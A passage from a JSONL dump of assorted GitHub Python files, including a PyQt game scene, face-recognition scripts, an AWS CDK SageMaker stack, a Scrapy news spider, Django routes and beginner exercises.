QPushButton(\"Kitchen\", self)\n self.kitchenButton.setGeometry(self.width/2-self.button_width/2,self.image_height-self.button_height,self.button_width,self.button_height)\n self.kitchenButton.clicked.connect(self.toKitchen)\n\n def setInteractionButtons(self):\n bw = 25\n bh = 25\n\n # Coffee Beans\n self.beansButton = QPushButton(\"\", self)\n self.beansButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.beansButton.setGeometry(288,695,bw,bh)\n self.beansButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.beansButton.clicked.connect(self.toBeans)\n\n # Chemex\n self.chemexButton = QPushButton(\"\", self)\n self.chemexButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.chemexButton.setGeometry(565,545,bw,bh)\n self.chemexButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.chemexButton.clicked.connect(self.toChemex)\n\n # Filters\n self.filterButton = QPushButton(\"\", self)\n self.filterButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.filterButton.setGeometry(170,650,bw,bh)\n self.filterButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.filterButton.clicked.connect(self.toFilters)\n\n # Frother\n self.frotherButton = QPushButton(\"\", self)\n self.frotherButton.setIcon(QIcon(\"../images/icons/magnifying_glass.png\"))\n self.frotherButton.setGeometry(735,545,bw,bh)\n self.frotherButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.frotherButton.clicked.connect(self.toUnused)\n\n def setEasterEggButtons(self):\n # Mixed\n self.mixerButton = QPushButton(\"\", self)\n self.mixerButton.setGeometry(458,765,10,10)\n self.mixerButton.setStyleSheet(\"background-color: rgba(0, 255, 255, 0);\")\n self.mixerButton.clicked.connect(self.toMixer)\n\n def toKitchen(self, checked):\n self.close()\n\n def toBeans(self, checked):\n self.grabObject(\"beans\")\n\n def toChemex(self, checked):\n # need image\n self.grabObject(\"chemex\")\n\n def toFilters(self, checked):\n # need image\n self.grabObject(\"filters\")\n\n def toMixer(self, checked):\n if config.progress.mixer_clicked == False:\n config.progress.easter_egg_count += 1\n config.progress.mixer_clicked = True\n self.playAudio(\"mixer\")","repo_name":"HagenFritz/nancy-drew-forced-quarantine","sub_path":"src/Cabinet.py","file_name":"Cabinet.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17848791109","text":"import face_recognition as fr\nfrom app.engine import reconhece_face, get_rostos\nimport face_recognition_models\n\n\ndesconhecido = reconhece_face(\"./img/imgl.jpg\") #Fiz um teste de reconhecimento de imagem, para que o video reconheca\nif(desconhecido[0]):\n rosto_desconhecido = desconhecido[1][0]\n rostos_conhecidos, nomes_dos_rostos = get_rostos()\n resultados = fr.compare_faces(rostos_conhecidos, rosto_desconhecido)\n print(resultados)\n\n for i in range(len(rostos_conhecidos)):\n resultado = resultados[i]\n if(resultado):\n print(\"Rosto do\", nomes_dos_rostos[i], \"foi reconhecido\")\n\nelse:\n print(\"Nao foi encontrado nenhum rosto\")","repo_name":"luisGust4vo/Reconhecimento-de-Rosto","sub_path":"projeto/app/fotos.py","file_name":"fotos.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25392427980","text":"from aws_cdk import (core, aws_ec2 as ec2, aws_ecs as ecs, aws_ecs_patterns as\n 
ecs_patterns, aws_elasticache as ec, aws_rds as rds, aws_iam as iam)\nfrom .ecs_helper import GWEcsHelper\nfrom .gw_helper import GWAppHelper\n\nimport json\n\n\nclass GWDknTrainStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, \n vpc: ec2.Vpc, ecs_role: iam.Role, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n \n dkn_train_image = \"233121040379.dkr.ecr.cn-northwest-1.amazonaws.com.cn/gw-dkn-train:latest\"\n\n cfg_dict = {}\n cfg_dict['name'] = 'dkn-train'\n cfg_dict['trigger_bucket']= \"{}-bucket-event\".format(cfg_dict['name'])\n lambda_train_role = GWAppHelper.create_lambda_train_role(self, cfg_dict['name'])\n sagemaker_train_role = GWAppHelper.create_sagemaker_train_role(self, cfg_dict['name'])\n\n #cfg_dict['input_bucket']= \"{}-bucket-model-{}\".format(cfg_dict['name'], cfg_dict['date'])\n #cfg_dict['output_bucket']= \"{}-bucket-model-{}\".format(cfg_dict['name'], cfg_dict['date'])\n\n hyperparameters = {'learning_rate': '0.0001', 'servable_model_die': '/opt/ml/model', 'loss_weight': '1.0', \n 'use_context': 'True', 'max_click_history': '30', 'num_epochs': '1', 'max_title_length': '16', 'entity_dim': '128', \n 'word_dim': '300', 'batch_size': '128', 'perform_shuffle': '1', 'checkpointPath': '/opt/ml/checkpoints'}\n\n cfg_dict['hparams'] = json.dumps(hyperparameters)\n cfg_dict['input_train_bucket'] = \"autorec-great-wisdom/train.csv/\"\n cfg_dict['input_test_bucket'] = \"autorec-great-wisdom/test.csv/\"\n cfg_dict['output_bucket'] = \"autorec-great-wisdom/output_model/\"\n cfg_dict['ecr'] = 'sagemaker-recsys-dkn-train'\n cfg_dict['instance'] = \"ml.p2.xlarge\"\n # image = \"856419311962.dkr.ecr.cn-north-1.amazonaws.com.cn/gw-infer:latest\"\n # cfg_dict['image_uri'] = '002224604296.dkr.ecr.us-east-1.amazonaws.com/sagemaker-recsys-dkn-train'\n cfg_dict['image_uri'] = dkn_train_image\n cfg_dict['lambda_role'] = lambda_train_role\n cfg_dict['sagemaker_role'] = sagemaker_train_role\n self.dkn_train = GWAppHelper.create_trigger_training_task(self, **cfg_dict)\n\n\n","repo_name":"leewaylicn/GW-Rec-Release","sub_path":"cdk/gw_stack/deploy/gw_dkn_train_stack.py","file_name":"gw_dkn_train_stack.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"15673167526","text":"x = [ [5,2,3], [10,8,9] ]\nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'}\n]\nsports_directory = {\n 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n}\nz = [ {'x': 10, 'y': 20} ]\n# --------10 to 15-----\n\n# x[1][0]= 15\n# print (x)\n\n# #------- jordan to Bryant------\n\n# students[0]['last_name']= \"Bryant\"\n# print (students)\n\n# #------messi to andres\n# sports_directory['soccer'][0] = \"andreas\"\n# print (sports_directory)\n\n# #----20 to 30 \n# z[0]['y']= 30\n# print(z)\n\n\n\n#2. 
Iterate Through a List of Dictionaries\nstudents = [\n{'first_name': 'Michael', 'last_name' : 'Jordan'},\n{'first_name' : 'John', 'last_name' : 'Rosales'},\n{'first_name' : 'Mark', 'last_name' : 'Guillen'},\n{'first_name' : 'KB', 'last_name' : 'Tonel'}\n]\n\n# def iterateDictionary(some_list):\n#     for students in some_list:\n#         for key, value in students.items():\n#             print(f\"{key}: {value}\")\n\n# iterateDictionary(students)\n\n\n# #Get Values From a List of Dictionaries\n# def iterateDictionary2(key_name, some_list):\n#     for dictionary in some_list:\n#         if key_name in dictionary:\n#             print(dictionary[key_name])\n# iterateDictionary2('first_name', students)\n\n# def iterateDictionary2(key_name, some_list):\n#     for dictionary in some_list:\n#         if key_name in dictionary:\n#             print(dictionary[key_name])\n# iterateDictionary2('last_name', students)\n\n# 4. Iterate Through a Dictionary with List Values\n\ndojo = {\n    'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n    'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(some_dict):\n    for key, value in some_dict.items():\n        print(f\"{key} - {len(value)}\")\n        for item in value:\n            print(item)\nprintInfo(dojo)","repo_name":"FehriAziz/python_stacks","sub_path":"01-python-fundamental/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20017625056","text":"import turtle\r\nt=turtle.Turtle()\r\nt.shape(\"turtle\")\r\necra=turtle.getscreen()\r\nt.left(90)\r\nfor i in range(10):\r\n    if i % 2==0:\r\n        t.right(90)\r\n        t.forward(50)\r\n    if i % 2 !=0:\r\n        t.left(90)\r\n        t.forward(50)\r\necra.mainloop()\r\n","repo_name":"Ruben15263/Python","sub_path":"escada.py","file_name":"escada.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21602053958","text":"BPE_FROM_PICKLE = True\nBPE_PATH = \"GCEBPE4m.model\"\n\nPYTORCH_TRANSFORMER = False\nSELF_ATTN = \"ORIGINAL\" #\"ORIGINAL\"|\"SUMMARIZED\"|\"OUR\"|\"CROSS\"\nLOAD_NEW_METHOD = True\nUSE_BPE = False\nMAX_LEN = 500\nGPUS = 4\nMAX_EPOCHS = 2\nPRECISION = 32 #32|16\nLEARNING_RATE = 3e-2\n\nN_LAYERS = 6\nNUM_HEADS = 8\nFORWARD_EXP = 4\n\nTRAIN_SRC = '.data/multi30k/train.en'\nTRAIN_TGT = '.data/multi30k/train.en'\nVAL_SRC = '.data/multi30k/val.en'\nVAL_TGT = '.data/multi30k/val.en'\nTEST_SRC = '.data/multi30k/test2016.en'\nTEST_TGT = '.data/multi30k/test2016.en'\n\nsentences = []\nsentences.append(\"A horse is walking beside a boat under a bridge.\")\nsentences.append(\"Two men are removing tree branches.\")\nsentences.append(\"A young boy in a red life jacket is swimming in a pool.\")\nsentences.append(\"Two kids are swinging on a playground.\")","repo_name":"zaidhassanch/PointerNetworks","sub_path":"Tranformers/T003b_transformerLightning/T004_zTranformerLightning/configs/config_engtoeng.py","file_name":"config_engtoeng.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7695741280","text":"from django.urls import path\n\nfrom common import views\n\nurlpatterns = [\n    # add a new column\n    path('add_column/', views.add_column),\n    # list all columns, regardless of level\n    path('get_column_all/', views.get_column_all),\n    # list top-level columns, nesting their sub-columns under 'child'\n    path('get_one_column/', 
views.get_one_column),\n]\n","repo_name":"17-12-20-ll/madao_success","sub_path":"common/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14608885099","text":"from __future__ import print_function\nfrom .util import Equirec2Cube\nfrom .util import Cube2Equirec\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.utils.data\nfrom PIL import Image\nimport torch.nn.functional as F\nfrom .submodule import *\nimport math\n\n\nclass forfilter(nn.Module):\n def __init__(self, inplanes):\n super(forfilter, self).__init__()\n\n self.forfilter1 = nn.Conv2d(1, 1, (7, 1), 1, (0, 0), bias=False)\n self.inplanes = inplanes\n\n def forward(self, x):\n out = self.forfilter1.cuda()(F.pad(torch.unsqueeze(x[:, 0, :, :], 1), pad=[0, 0, 3, 3], mode='replicate'))\n # ([1, 1, 134, 256])\n for i in range(1, self.inplanes):\n out = torch.cat((out, self.forfilter1(F.pad(torch.unsqueeze(x[:, i, :, :], 1), pad=[0, 0, 3, 3],\n mode='replicate'))), 1)\n return out\n\n\nclass disparityregression_sub3(nn.Module):\n def __init__(self, maxdisp):\n super(disparityregression_sub3, self).__init__()\n self.disp = Variable(torch.Tensor(\n np.reshape(np.array(range(maxdisp * 3)), [1, maxdisp * 3, 1, 1]) /\n 3).cuda(), requires_grad=False)\n\n def forward(self, x):\n disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])\n out = torch.sum(x * disp, 1)\n return out\n\n\nclass hourglass(nn.Module):\n def __init__(self, inplanes):\n super(hourglass, self).__init__()\n\n self.conv1 = nn.Sequential(convbn_3d(inplanes, inplanes * 2, kernel_size=3, stride=2, pad=1),\n nn.ReLU(inplace=True))\n\n self.conv2 = convbn_3d(inplanes * 2, inplanes * 2, kernel_size=3, stride=1, pad=1)\n\n self.conv3 = nn.Sequential(convbn_3d(inplanes * 2, inplanes * 2, kernel_size=3, stride=2, pad=1),\n nn.ReLU(inplace=True))\n\n self.conv4 = nn.Sequential(convbn_3d(inplanes * 2, inplanes * 2, kernel_size=3, stride=1, pad=1),\n nn.ReLU(inplace=True))\n\n self.conv5 = nn.Sequential(\n nn.ConvTranspose3d(inplanes * 2, inplanes * 2, kernel_size=3, padding=1, output_padding=1, stride=2,\n bias=False),\n nn.BatchNorm3d(inplanes * 2)) # +conv2\n\n self.conv6 = nn.Sequential(\n nn.ConvTranspose3d(inplanes * 2, inplanes, kernel_size=3, padding=1, output_padding=1, stride=2,\n bias=False),\n nn.BatchNorm3d(inplanes)) # +x\n\n def forward(self, x, presqu, postsqu):\n\n out = self.conv1(x) # in:1/4 out:1/8\n pre = self.conv2(out) # in:1/8 out:1/8\n if postsqu is not None:\n pre = F.relu(pre + postsqu, inplace=True)\n else:\n pre = F.relu(pre, inplace=True)\n\n out = self.conv3(pre) # in:1/8 out:1/16\n out = self.conv4(out) # in:1/16 out:1/16\n\n if presqu is not None:\n post = F.relu(self.conv5(out) + presqu, inplace=True) # in:1/16 out:1/8\n else:\n post = F.relu(self.conv5(out) + pre, inplace=True)\n\n out = self.conv6(post) # in:1/8 out:1/4\n\n return out, pre, post\n\n\nclass cost_basic(nn.Module):\n def __init__(self, maxdisp):\n super(cost_basic, self).__init__()\n self.maxdisp = maxdisp\n\n self.dres0_0 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n\n self.dres1_0 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.dres0_1 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 
1),\n nn.ReLU(inplace=True))\n\n self.dres1_1 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.dres2 = hourglass(32)\n\n self.dres3 = hourglass(32)\n\n self.dres2_1 = hourglass(32)\n\n self.dres3_1 = hourglass(32)\n\n self.dres4 = hourglass(32)\n\n self.fuse0 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.fuse1 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),\n nn.ReLU(inplace=True),\n convbn_3d(32, 32, 3, 1, 1),\n nn.ReLU(inplace=True))\n self.classif1 = nn.Sequential(\n convbn_3d(32, 32, 3, 1, 1), nn.ReLU(inplace=True),\n nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1, bias=False))\n\n self.classif2 = nn.Sequential(\n convbn_3d(32, 32, 3, 1, 1), nn.ReLU(inplace=True),\n nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1, bias=False))\n\n self.classif3 = nn.Sequential(\n convbn_3d(32, 32, 3, 1, 1), nn.ReLU(inplace=True),\n nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1, bias=False))\n self.c2e = Cube2Equirec(32, 64, 128)\n self.e2c = Equirec2Cube(64, 128, 32)\n self.forF = forfilter(32)\n self.forF1 = forfilter(32)\n\n def forward(self, outputs_up, outputs_down, training):\n global pred1, pred2\n cube_feat1 = torch.from_numpy(\n self.e2c.run(outputs_up[0].cpu().detach().numpy()).astype(np.float16)[np.newaxis, :]).cuda()\n cube_feat2 = torch.from_numpy(\n self.e2c.run(outputs_down[0].cpu().detach().numpy()).astype(np.float16)[np.newaxis, :]).cuda()\n if not training:\n cube_feat1 = torch.tensor(cube_feat1, dtype=torch.float32)\n cube_feat2 = torch.tensor(cube_feat2, dtype=torch.float32)\n #print(\"begin my cost catch:\", \"\\n\", \"cube_up:\", np.shape(cube_feat1), \"output_up\", np.shape(outputs_up), \"\\n\",\n # \"cube_down:\", np.shape(cube_feat2), \"outputs_down\", np.shape(outputs_down))\n cost = Variable(\n torch.zeros(outputs_up.size()[0],\n outputs_up.size()[1] * 2, int(self.maxdisp / 4 * 3),\n outputs_up.size()[2],\n outputs_up.size()[3]), requires_grad=True).cuda()\n\n for i in range(int(self.maxdisp / 4 * 3)):\n if i > 0:\n cost[:, :outputs_up.size()[1], i, :, :] = outputs_down[:, :, :, :]\n cost[:, outputs_up.size()[1]:, i, :, :] = shift_down[:, :, :, :]\n shift_down = self.forF(shift_down)\n else:\n cost[:, :outputs_up.size()[1], i, :, :] = outputs_down\n cost[:, outputs_up.size()[1]:, i, :, :] = outputs_up\n shift_down = self.forF(outputs_up)\n\n cost1 = Variable(\n torch.zeros(cube_feat1.size()[0],\n cube_feat1.size()[1] * 2, 16,\n cube_feat1.size()[2],\n cube_feat1.size()[3]), requires_grad=True).cuda()\n siz3 = cube_feat1.size()[3]\n for i in range(16):\n if i > 0:\n cost1[:, :cube_feat1.size()[1], i, :, :int(siz3 / 3 * 2)] = cube_feat1[:, :, :, :int(siz3 / 3 * 2)]\n cost1[:, cube_feat1.size()[1]:, i, :, :int(siz3 / 3 * 2)] = shift_cube2[:, :, :, :]\n # ([1, 32, 63, 256])\n shift_cube2 = self.forF1(shift_cube2)\n\n cost1[:, :cube_feat1.size()[1], i, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)] \\\n = cube_feat1[:, :, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)]\n cost1[:, cube_feat1.size()[1]:, i, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)] \\\n = cost_ud().run(cube_feat2[:, :, :, int(siz3 / 3 * 2):int(siz3 / 6 * 5)], i)\n\n cost1[:, :cube_feat1.size()[1], i, :, -int(siz3 / 6 * 1):] \\\n = cost_ud().run(cube_feat1[:, :, :, -int(siz3 / 6 * 1):], i)\n\n cost1[:, cube_feat1.size()[1]:, i, :, -int(siz3 / 6 * 1):] \\\n = cube_feat2[:, :, :, -int(siz3 / 6 * 1):]\n\n else:\n cost1[:, :cube_feat1.size()[1], i, :, :] = 
cube_feat1[:, :, :, :]\n                cost1[:, cube_feat1.size()[1]:, i, :, :] = cube_feat2[:, :, :, :]\n\n                shift_cube2 = self.forF1(cube_feat2[:, :, :, :int(siz3 / 3 * 2)])\n\n        cost = cost.contiguous()  # ([1, 64, 32, 128, 256])\n        cost2 = cost1.contiguous()  # ([1, 64, 16, 64, 384])\n        cost_cube = torch.zeros(cost.size()[0], cost.size()[1], cost.size()[2], cost.size()[3], cost.size()[4]).cuda()\n        for p in range(cost2.size()[2]):\n            cost_cube[:, :, p, :, :] = self.c2e.run(cost1[:, :, p, :, :])\n\n        cost0 = self.dres0_0(cost)\n        cost0 = self.dres1_0(cost0) + cost0  # cost0[1, 32, 12, 128, 256]\n        cost0_cube = self.dres0_1(cost_cube)\n        cost0_cube = self.dres1_1(cost0_cube) + cost0_cube  # cost0[1, 32, 12, 128, 256]\n\n        out1_cube, pre1_cube, post1_cube = self.dres2_1(cost0_cube, None, None)\n        out1_cube = out1_cube + cost0_cube\n        out2_cube, pre2_cube, post2_cube = self.dres3_1(out1_cube, pre1_cube, post1_cube)\n        out2_cube = out2_cube + cost0_cube\n\n        out1, pre1, post1 = self.dres2(cost0, None, None)  # out1 + cost0:([1, 32, 12, 128, 256])\n        out1 = self.fuse0(torch.cat((F.relu(out1 + cost0, inplace=True), out1_cube), dim=1))\n        pre1 = F.relu(pre1 + pre1_cube, inplace=True)\n        post1 = F.relu(post1 + post1_cube, inplace=True)\n\n        out2, pre2, post2 = self.dres3(out1, pre1, post1)\n        out2 = self.fuse1(torch.cat((F.relu(out2 + cost0, inplace=True), out2_cube), dim=1))\n\n        post2 = F.relu(post2 + post1_cube, inplace=True)\n\n        out3, pre3, post3 = self.dres4(out2, pre1, post2)\n        out3 = F.relu(out3 + cost0, inplace=True)\n\n        cost1 = self.classif1(out1)\n        cost2 = self.classif2(out2) + cost1\n        cost3 = self.classif3(out3) + cost2\n\n        if training:\n            cost1 = F.interpolate(cost1, [self.maxdisp * 3, outputs_up.size()[2] * 4, outputs_up.size()[3] * 4],\n                                  mode='trilinear', align_corners=True)\n            cost2 = F.interpolate(cost2, [self.maxdisp * 3, outputs_up.size()[2] * 4, outputs_up.size()[3] * 4],\n                                  mode='trilinear', align_corners=True)\n\n            cost1 = torch.squeeze(cost1, 1)\n            pred1 = F.softmax(cost1, dim=1)\n            pred1 = disparityregression_sub3(self.maxdisp)(pred1)\n\n            cost2 = torch.squeeze(cost2, 1)\n            pred2 = F.softmax(cost2, dim=1)\n            pred2 = disparityregression_sub3(self.maxdisp)(pred2)\n\n        cost3 = F.interpolate(cost3, [self.maxdisp*3, outputs_up.size()[2]*4, outputs_up.size()[3]*4],\n                              mode='trilinear', align_corners=True)\n        cost3 = torch.squeeze(cost3, 1)\n        pred3 = F.softmax(cost3, dim=1)\n        pred3 = disparityregression_sub3(self.maxdisp)(pred3)\n\n        if training:\n            return pred1, pred2, pred3\n        else:\n            return pred3, None, None\n","repo_name":"01fast/Panoramic-Stereo-Matching-Network-based-on-Bi-Projection-Fusion","sub_path":"networks/cost_basic.py","file_name":"cost_basic.py","file_ext":"py","file_size_in_byte":11551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3505824180","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom scrapy import Request\n\nfrom scrapy_news.items import ScrapyNewsItem\n\n\nclass BaseSpider(scrapy.Spider):\n    \"\"\"\n    Fetch the URL list of China agricultural news\n    \"\"\"\n\n    name = 'agricultural'\n    allowed_domains = ['www.farmer.com.cn']\n    start_urls = ['http://www.farmer.com.cn/xwpd/btxw/']\n\n    def parse(self, response):\n        _tmp_url_list = response.xpath(\n            '//div[@class=\"yui3-g list-list-li\"]/div[@class=\"yui3-u\"]/a[@class=\"vvqqq\"]/@href').extract()[:100]\n\n        agricultural_news_url_list = [\"http://www.farmer.com.cn/xwpd/btxw/%s\" %\n                                      _tmp_url for _tmp_url in _tmp_url_list]\n        for political_news_url in agricultural_news_url_list:\n\n            # callback usage: agricultural_detail (another method) parses each article page\n            yield 
Request(url=political_news_url, callback=self.agricultural_detail)\n\n    def agricultural_detail(self, response):\n        item = ScrapyNewsItem()\n        base_contents_list = response.xpath('//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/div/text()').extract()\n        tag_p_contents_list = response.xpath('//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/p/text()').extract()\n        tag_image_contents_list = response.xpath('//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/div[@class=\"Custom_UnionStyle\"]/p/text()').extract()\n        base_contents = \"\\n\".join(base_contents_list).strip()\n        tag_p_contents = \"\\n\".join(tag_p_contents_list).strip()\n        tag_image_contents = \"\\n\".join(tag_image_contents_list).strip()\n        contents = base_contents + tag_p_contents + tag_image_contents\n        if not contents:\n            return\n        try:\n            item[\"image\"] = response.xpath(\n                '//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/div[@class=\"Custom_UnionStyle\"]/p/img/@src'\n            ).extract()[0]\n        except:\n            pass\n\n        item[\"title\"] = response.xpath(\n            '//div[@class=\"zhengwen-left-container\"]/h1[@class=\"wtitle\"]/text()').extract()[0]\n        item[\"contents\"] = contents\n        item[\"auth\"] = response.xpath(u'//div[@class=\"content\"]/div[contains(text(),\"责任编辑\")]/text()').extract()[0]\n        item[\"occurd_time\"] = response.xpath('//div[@class=\"yui3-g\"]/div[@class=\"yui3-u\"]/p[@class=\"wlaiyuan\"]/text()').extract()[0]\n        item[\"source_url\"] = response.url\n        item[\"source\"] = u\"中国农业新闻网\"\n\n        yield item\n","repo_name":"codebeen/chuangemen","sub_path":"bin/scrapy_news/scrapy_news/spiders/agricultural_news.py","file_name":"agricultural_news.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34370927218","text":"import sys\nfrom os.path import dirname, exists, join\n\nDATA_DIR = join(dirname(__file__), 'data')\n\nDBS = ['home_sensors_v1']\n\ndef on_server_loaded(server_context):\n    if not all(exists(join(DATA_DIR, '%s.csv' % x)) for x in DBS):\n        print()\n        print(\"Due to performance considerations, you must first run background_downloader.py to download the data set yourself.\")\n        print()\n\n        sys.exit(1)","repo_name":"dudasdavid/HomeSensorsWebApp","sub_path":"app_hooks.py","file_name":"app_hooks.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8501673253","text":"import cv2 as cv\r\nimport os\r\nimport glob\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom tensorflow.keras import layers, models\r\n\r\ndef resize(img):\r\n    width = 200\r\n    height = 200  # fixed 200x200 input size expected by the model\r\n    dim = (width, height)\r\n    # resize image\r\n    resized = cv.resize(img, dim, interpolation=cv.INTER_AREA)\r\n    return resized\r\n\r\ndef get_images(location, format):\r\n    image_array = []\r\n    files = glob.glob(\"\" + location + \"*.\" + format + \"\")\r\n    cv2_base_dir = os.path.dirname(os.path.abspath(cv.__file__))\r\n    face_model = os.path.join(cv2_base_dir, 'data/haarcascade_frontalface_default.xml')\r\n    eye_model = os.path.join(cv2_base_dir, 'data/haarcascade_eye.xml')\r\n    face_cascade = cv.CascadeClassifier(face_model)\r\n    eye_cascade = cv.CascadeClassifier(eye_model)\r\n    for myFile in files:\r\n        image = cv.imread(myFile)\r\n        faces = face_cascade.detectMultiScale(image, 1.3, 5)\r\n        print(len(faces))\r\n        if len(faces) >= 1:\r\n            for face in faces:\r\n                (x, y, w, h) = face\r\n                face_img = cv.rectangle(image, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n                cropped_face 
= face_img[y:y + h, x:x + w]\r\n                eyes = eye_cascade.detectMultiScale(cropped_face)\r\n                if len(eyes) >= 2:\r\n                    image_conv = resize(cropped_face)\r\n                    image_array.append(image_conv)# append each image to array\r\n                else:\r\n                    print(\"Bad Image\")\r\n        else:\r\n            print(\"Bad Image\")\r\n    return image_array\r\n\r\n\r\ndef create_model(className):\r\n    model = models.Sequential()\r\n    model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(200, 200, 3)))\r\n    model.add(layers.MaxPooling2D((2, 2)))\r\n    model.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\n    model.add(layers.MaxPooling2D((2, 2)))\r\n    model.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\n    model.summary()  # let's have a look at our model so far\r\n\r\n    model.add(layers.Flatten())\r\n    model.add(layers.Dense(64, activation='relu'))\r\n    model.add(layers.Dense(len(className)))\r\n    model.summary()\r\n    model.compile(optimizer='adam',\r\n                  loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n                  metrics=['accuracy'])\r\n    return model\r\nclassName = [\"Cristiano Ronaldo\",\"Lionel Messi\",\"Paulo Dybala\",\"Sergio Aguero\",\"Sergio Romero\"]\r\nmodel = create_model(className)\r\ncheckpoint_path = \"training_1/cp.ckpt\"\r\n\r\n# load weights into the untrained model from the checkpoint path\r\nmodel.load_weights(checkpoint_path)\r\n\r\nim_arr = get_images(\"pred/\",\"jpg\")\r\npredict_images_mat = np.array(im_arr)\r\n# test accuracy on the test dataset\r\npredictions = model.predict(predict_images_mat)\r\nprint(predictions)","repo_name":"hamzakarim94/Sports-Classifier","sub_path":"Load_trained_model.py","file_name":"Load_trained_model.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1321829228","text":"#!/usr/bin/env python3\n\n\nimport multiprocessing\nimport os\nimport os.path\n\nfrom jnscommons import jnsos\n\nPROC_MEM_FILE = '/proc/meminfo'\nPROC_CPU_FILE = '/proc/stat'\n\nSYSMONITOR_CONFIG_DIR = os.path.join(os.path.expanduser('~'), '.jns/sysmonitor')\nOLD_CPU_STAT_FILE = 'old-cpu-stat.txt'\nOLD_CPU_USAGE_FILE = 'old-cpu-usage.txt'\n\n# The time lengths in /proc/stat are measured in 1/100ths of a second by default on x86 systems. These variables are the\n# minimum/maximum amount of time between reading the CPU stats that this script will allow. If the time between\n# readings is less than the minimum, the old CPU usage will be used. If the time between readings is greater than the\n# maximum, the CPU usage will be `None'.\n#\n# The time lengths have to be multiplied by the number of CPU cores in the current computer. This is because the master\n# CPU stat line is just a summation of all the individual CPU cores' stat lines. So, with an 8 core machine, if a single\n# second has passed between readings of the stats, each CPU stat line will have incremented by a second. 
